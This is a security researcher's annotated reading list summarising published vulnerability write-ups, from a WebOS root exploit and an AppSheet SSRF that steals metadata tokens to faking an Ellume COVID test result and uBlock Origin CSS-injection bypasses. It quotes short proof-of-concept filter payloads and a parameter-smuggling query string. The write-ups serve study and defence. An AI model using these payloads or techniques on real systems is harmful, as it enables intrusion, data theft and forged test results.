Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

V8 Heap pwn and /dev/memes - WebOS Root LPE- 727

David Buchanan    Reference →Posted 4 Years Ago
  • WebOS is the operating system used by LG TVs. Finding vulnerabilities in this may allow for the compromise of a TV. The LG TV includes a built in developer mode that allows users to sideload applications inside of a chroot jail SSH shell. The applications can either contain native code or be HTML/JS based.
  • V8 is a JavaScript and Web Assembly Engine used in modern browsers for Chrome. Since WebOS is heavily based upon Chrome, attacking V8 is a good vector. Long before this article was written, the author noticed the heavy usage of Snapshot Blobs. Snapshot blobs allow a previously created V8 context to be dynamically loaded to save time. So, what if we modified this upon application load?
  • It turns out that V8 assumes that the snapshots are benign! If you modify anything on the V8 heap, such as the length of some buffer, it takes this as true. Using this primitive, we can trivially compromise the WebOS renderer to escalate our privileges from the CHROOT jail.
  • The author talks some about the V8 exploitation from a CTF that the same exact vulnerability. Overall exploit strategy and RWX in JITed function. In general though, the author corrupts the snapshot to create an easy addrof() and fakeobj primitives then uses this to execute their own shellcode. To me, the interesting part was the finding of the bug in the first place.
  • With code execution in the context of the WebOS's browser engine, we are looking good. However, this user does not run as root. So, it is time for another LPE. In WebOS, the interface /dev/mem is world writable! This gives us direct access to the physical address space, which is the keys to the castle.
  • To actually exploit this, the author did a linear search for the struct cred in RAM. Once they found it, they elevated its creds to root by writing to /dev/mem directly. Another trick they had to use was to find the addresses in physical memory that we wanted by accessing the contents of iomem_resource. Using this, they could find the proper task information to access, eventually modifying the task associated with our process.
  • Overall, this is an interesting article that took a small oversight in the usage of snapshots and turned it into a privilege escalation. Good work!

Bypassing early 2000s copy protection for software preservation- 726

Paavo Huhtala     Reference →Posted 4 Years Ago
  • There was a Swedish children's video game series called Mulle Meck. This series released 5 games but most of the CDs are gone, since this was in the late 90s. Luckily, these games are preserved on archive.org.
  • There is a problem with one of the games in the series though: DRM. Mounting the disc imagine does absolutely nothing if it is attempted to be mounted. Time to break DRM with modern technology!
  • The game does not mount because of a copy protection known as SafeDisc2; this was very common for the era. This DRM is easily identified with a magic string inside of the main binary. The DRM itself is loaded via a driver, which was known to be riddled with security vulnerabilities.
  • The SafeDisc signature is within setup.exe, which boots the game. So, the author had an idea: "If SafeDisc is used on the installer, why don't we just install it ourselves?"
  • By extracting the game from the CD directly and mimicking the installation process, the game could be loaded without any DRM but comes with a weird error message: The program is not installed correctly. Please run the installer again. This required some digging.
  • The application took out Ghidra but got lost in the sauce. The executable was not just a game. It was Adobe Shockwave player (Macromedia Projector) with the game data simply added to the end of the file. Instead of going the Shockwave altering route, they decided to use another tool: Procmon.
  • Procmon logs all of the WinApi calls for the attached to application. After clicking through the tool for a while, they noticed a registry key access to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MulleHus.exe. If this was not found, then the application would crash since it thought that the game was not properly installed.
  • The final DRM was checking if specific files existed on the system running the game. If these files did not exist, then the game would not run, as it thought this was a bad installation. This was found via the Procmon tool as well.
  • Most DRM bypasses are about modifying the actual game or breaking cryptography. In this case, the DRM was simply side-stepped by adding in files and skipping the installer.

Faking A Positive COVID Test- 725

Ken Gannon - FSecure    Reference →Posted 4 Years Ago
  • COVID tests are becoming more and more popular. As in the modern world, computer technology is being added to the tests. The Ellume COVID-19 Home Test was looked at in this case.
  • The analyzer itself was a custom board and a standard Lateral Flow test, with the custom board determining if the user was COVID positive or negative. The analyzer would then inform the companion mobile app if the user was COVID positive or negative.
  • The Android application had an un-exported activity. On a rooted device, this can be interacted with. This activity appeared to be for debugging the application from the developer side. From looking at this, the author of the post looked a bunch about the bluetooth communication.
  • There were two types of messages: STATUS and MEASUREMENT_CONTROL_DATA. From further reverse engineering, they found the data in each of the packets. The MEASUREMENT_CONTROL_DATA packet had line information, test ID, checksum, crc and many other values.
  • The STATUS packet had the status of the test (positive or negative), measurement count and some other information. This was found by looking at the classes in the decompiled Android application.
  • How does somebody go about attacking this though? Currently, the US government allows for Ellume to administrator COVID tests for events. Once the test has been taken, the phone application on a users device is used to demonstrate the result of the test.
  • At this point, a malicious user could use Frida to hijack the flow of the application to return the data from the test. Once the data has been changed and the CRC rewritten, a certificate with the fake information comes out.
  • To me, this flow is fundamentally flawed. If an attacker can store this information on their phone, then what stops them from making a completely altered version of the application? Or, even their own phone app? In my opinion, the test should hook up to a test administrators phone instead of the users.
  • To fix this problem, the authors told Ellume to implement further analysis to ensure that data spoofing is not possible. Additionally, obfuscation and OS checks on the Android app should be done. However, these are not true protections: they only slow attackers down. A redesign in usage would be required to fix this.

How I found (and fixed) a vulnerability in Python- 724

Adam Goldschmidt    Reference →Posted 4 Years Ago
  • Many attack vectors focus on the difference between either the verifier and the user or many different points in the chain interpreting the same data. Recently, HTTP Smuggling and Web Cache Poisoning.
  • The author of this article was trying to find issues relating to different points interpreting data improperly at different points. They decided to focus on Flask, Bottle and Tornado, which are popular web frameworks.
  • The author noted that the URL parsing of these libraries were different. After discussing with members of the open source community, they were lead to the standard Python library calls. In particular, urlparse in Python.
  • The urlparse module treats semicolons as a separator. However, most modern proxies only treat ampersands as separators. Practically, an attacker could separate query parameters using a semicolon (;) where one server would see multiple query parameters while the other would see one less.
  • For instance, the parameters ?link=http://google.com&utm_content=1;link='>alert(1) HTTP/1.1 would see 3 query parameters: link, utm_content and link. However, modern proxies would only see link and utm_content. Neat! Cache desyncing!
  • The author created a pull request into CPython. This led to a change in Python 3.9 that the ; (semicolon) is not a separator anymore. The original W3C specification for URLs allowed semicolons as separators. However, more recent recommendations change this to only allow an ampersand as a separator.
  • Overall, fairly good article but I wish more details were given. Issues between steps like this one are not going away any time soon!

Shamir’s Secret Sharing Vulnerabilities- 723

Filipe Casal & Jim Miller - Trail of Bits    Reference →Posted 4 Years Ago
  • Threshold signature schemes are a protocol that allows a group of users to generate and control a private signing key. Using this, jointly the users can sign the data but it cannot be done individually.
  • Secret Sharing is a protocol for splitting a secret key into key shares. These shares can be combined in order to create a key. A common technique for this is Shamir Secret Sharing. The high-level idea behind Shamir’s scheme is that for n users, you want at least t of them (where t <= n) to recover the secret by combining their shares.
  • To make this work, a polynomial of p of degree t-l (t users necessary to use the secret) over a finite group. The shares are created by evaluating the polynomial at n (amount of users) at different points with one for each user. The key is that a single point does not reveal any information about the polynomial.
  • Since the secret value is encoded in the polynomial, recovering the polynomial recovers the secret.
  • Since the constant term of the polynomial is the secret value, it is essential that the x-value of the point is non-zero. Otherwise, the secret will be exposed. In many of the libraries, the implementation did not stop this from happening! So, it would be possible for the secret to get leaked to one of the share holders!
  • Many of the implementations used a unique ID value for the polynomial to choose. Additionally, when you operate over a finite group, it is modulo the order of the group. This means that even if 0 was not allowed, a wrap around could be used to access the zeroth element to find the key.
  • The second bug was a divide by 0. Many people forget that modulus is a division operation as well. Hence, the authors of the libraries forgot to check for the 0 case, leading to crashes.
  • The authors noted that these algorithms had very little implementation standards. As a result, they created ZKDocs to provide and help developers create non-standard cryptographic primitives.
  • Overall, this was an interesting attack that uses basic math to break the implementation. I particularly appreciated the modulus wrap around attack about this.

Rocket.Chat Client-side Remote Code Execution- 714

SSD    Reference →Posted 4 Years Ago
  • Rocket Chat is an open source variation of Slack; a team based messaging service with many collaboration tools built in. Rocket Chat has a desktop application built on Electron.
  • Rocket Chat has a desktop application that allows for same host navigation. This means that any link to the same host will be opened in the desktop application itself. By itself, this is not a problem. But, what if we can get something we control to be opened in Electron?
  • Rocket Chat allows users to open files to locations such as S3, GCloud and other places. By using the URI redirect that goes to an uploaded file with JavaScript, the code will be executed within the application!
  • Since the line between client-side JavaScript and desktop programming is quite blurred with Electron, this XSS gives access to the host! Using this, files, passwords or whatever the attacker wants could be stolen from the desktop application.
  • Electron apps are hard to lock down. Developers need to be careful with XSS and redirects specifically.

Proctorio Chrome extension Universal Cross-Site Scripting- 713

Sector 7    Reference →Posted 4 Years Ago
  • With the rise of online schooling, teachers need to ensure students could not cheat during tests. A way to prevent cheating on tests is the Proctorio Chrome extension, which can view internet traffic, alter the page and many other things.
  • The extension inspects web traffic of the browser. Depending on the paths that are configured via the administrator, it will inject content into the scripts of the page. Once a test has started, a toolbar is added with a number of buttons, such as a calculator.
  • When the = button is ran, a computation via the JavaScript eval() function is called. Since the input is never checked for mathematical expressions, we have XSS within the context of the Chrome Extension.
  • XSS is a bad vulnerability to find. In the context of a browser extension that can always be triggered, this turns into universal cross-site scripting. By sending a URL that matches the demo mode for the chrome extension, the calculator can be called in order to control to get XSS in the extension.
  • The extension content script does not have the full permissions of the extension. But, major damage can still be done. Using XSS, a request can be made that bypasses the same origin policy to return arbitrary data. For instance, an attacker could steal emails from an inbox or anything else on any website that is visited. Damn, that is a real bad bug!

NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories- 712

Shir Tamari - Wiz.io    Reference →Posted 4 Years Ago
  • Azure App Service is a cloud computing platform for hosting websites and web applications. The service is meant to be super easy to use to deploy code quickly. The code can be pulled via SSH, Github or other places.
  • A classic website configuration problem is exposing the sensitive files on the server by accidentally exposing them in the web root of the server. Included in this category of sensitive files is the .git folder.
  • .git holds all of the information about a git repository from the first commit to the most recent. By getting access to this directory, it is possible to recover the entire source code from the application!
  • Source code may have hardcoded passwords, important intellectual property and many other sensitive pieces of information. Being able to steal the source code is a terrible vulnerability.
  • The solution that Azure App Services implemented for this was to add information to the web.config. Since web.config is only C# specific, this mitigation only worked on C# applications. As a result, deployments for PHP, Ruby, Python and Node that uses Apache, Nginx, Flask and many other things were vulnerable to this attack.
  • This vulnerability is incredibly simple and I am astonished this went unnoticed for 4 years (since 2017). As an attacker, I would be rather lucky than good!

SSRF vulnerability in AppSheet - Google VRP - 711

David Nechuta    Reference →Posted 4 Years Ago
  • Google Appsheet is a no-code app generator. While looking around for functionality, they found a section called Workflows which made it possible to automate app behavior via rules. One of these options was a webhook.
  • Since these hooks required a URL, they placed an internal URL to try to steal the metadata information from the instance, which would include keys for the box. However, they ran into a problem: he needed to make a GET request when the application only supported POST/PUT requests.
  • In order to get around this problem, they make the request to a separate website that they control. In the response, they send a 301 redirect to change the URL to be internal and the request method to be a GET request. Amazingly enough, this worked for getting back the access token!
  • It turns out that the API would accept a POST or GET request, which made the shenanigans above not necessary. Try the stupid simple thing first!
  • The fix was to disable the legacy API for metadata information, which the author had used in their exploit originally. Additionally, the addition of the Metadata-Flavor was banned, since it was required for the request, making SSRF not exploitable. However, the webhook could add custom headers. They found that an alternative to the Metadata-Flavor could used to trigger the metadata request: X-Google-Metadata-Request.
  • Overall, good read with some neat SSRF tricks!

uBlock, I exfiltrate: exploiting ad blockers with CSS- 710

Gareth Hayes - Portswigger    Reference →Posted 4 Years Ago
  • uBlock origin is a popular ad blocker. This works by community provided filter lists, which work by using CSS selectors to determine which elements to block. Since these lists are not entirely trusted, the need to be constrained from running arbitrary CSS. So, is there a way around this? That is what this post is all about! Major S/O to Zi on DayZeroSec for explaining and diving deeper into how these work.
  • The research all started from a Tavis Ormandy post on CSS injection. The payload is just like below:
    example.com##div:style(--foo: 1/*)
    example.com##div[bar="*/;background-image: url(https://google.com);}/*"]
    
    The key to this is the /*, which is a code comment. By adding this comment in one block, then ending it in another block, the CSS selector can be escaped to add arbitrary CSS.
  • The vulnerability above was patched by adding a check when operating on styles to not allow opening or closing comments. To bypass this security check, simply open up a comment NOT in the styles to trigger the same CSS injection bug as before. Blocking the comment was just not enough. The POC is shown below:
    ##input,input/*
    ##input[x="*/{}*{background-color:red;}"]
    
  • The fix for this was more global in scale instead of denylisting a few characters. Instead of trying to detect the selectors via code, they use an actual style sheet to validate that the filter cannot be injected. If the filter as injection into the style sheet, then the program will now catch it. It is awesome to see a global fix to this problem!
  • After this, the author decided to see if the cosmetic filters functionality, which allow for powerful CSS selectors, could be bypassed. The same trick for using a starting comment on one line and an ending comment in another allowed for the smuggling of a payload as well. This payload works since the validation code for document.querySelector allowed invalid syntax. This was fixed by checking for opening and closing comments in the rules.
  • At this point, the obvious attack vectors were gone with the comments running out of life. Gareth Hayes decided to fuzz what was allowed and what is not allowed in CSS. They noticed that a CSS selector can also use curly braces to add more functionality inside of it. Adding onto this though, if there is no closing curly brace for the selector, then a semicolon will NOT result in the starting of a new rule. Instead, it would add TWO selectors to the code, smuggling in a single one.
  • The reason for this being possible is better explained in the DayZeroSec post linked above. The patch limits the amount of CSS style declarations added in the case of one being smuggled in (as above). The vulnerable code path tries to ensure that a non-zero value is returned, which leaves a lot of wiggle room! Although this is not perfectly correct since, when something is smuggled in, more than 1 (such as 2) selectors could be added in.
  • The patch for this was to prevent all smuggled in selectors from being used by adding in a specific check to ensure that the amount of added selectors is exactly 1. Failing closed as opposed to failing open makes a big deal in security sensitive operations such as this one! The POC for this exploit is shown below (notice the missing curly brace):
    *#$#* {background:url(/abc);x{  background-color: red;}
    
  • The final bypasses were specific to different browsers. While the powerful url was blocked from usage in the CSS, some browser specific functions were not. In Chrome, image-set could be used to exfiltrate data using only CSS.
  • With CSS injection, how do you do anything useful? Obviously you can alter the page for phishing but can you steal data? Using attribute-based selectors, it is easy to steal information. The author of the post creates a CSS keylogger, which could be used to steal passwords and other sensitive information. They even though a way to steal the first N-characters using selectors in Firefox.
  • To top it off, they found a JavaScript URI injection into a list. But, the great CSP used by uBlock origin made it impossible to exploit. Overall, a few good takeaway:
    • Fix classes of bugs by addressing the root cause of the problem. This was done multiple times by the uBlock Origin team throughout this process.
    • Fuzzing formats can be useful when trying to smuggle in data. Gareth Hayes has done this in a few other cases with great results!
    • Allowlists are much better than denylists! Banning certain functions will lead to somebody finding a new one to use and bad error checks will always be exploited.